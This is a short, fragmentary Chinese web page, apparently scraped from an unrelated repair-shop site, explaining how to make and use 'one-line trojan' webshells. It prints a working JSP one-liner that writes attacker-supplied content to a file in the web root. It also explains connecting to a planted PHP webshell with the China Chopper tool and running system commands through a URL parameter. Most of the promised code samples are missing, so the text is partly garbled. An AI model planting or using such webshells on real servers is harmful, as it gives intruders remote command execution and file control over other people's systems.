脚本木马的制作与原理 |
您所在的位置:网站首页 › 脚本特洛伊木马 › 脚本木马的制作与原理 |
webshell(web后门)
一、一句话木马
短小精悍,功能强大,隐蔽性好。 说明: 使用request的话,post和get两中方式传来的数据都可以接受。 execute用来执行客户端传来的数据。 代码本身没有危害,关键在于我们传输的数据是什么。 常见写法asp一句话木马 php一句话木马 aspx一句话木马 jsp一句话木马 < % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >利用中国菜刀进行连接 这边我用phpstudy做演示,需要把一句话木马文件放在网站根目录。
这样可以执行系统命令。注意再次使用中国菜刀连接其他链接之前,需要重置下缓存。 在浏览器输入 http://localhost/123.php?xx=ipconfig执行系统命令
一句话使用技巧
|
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |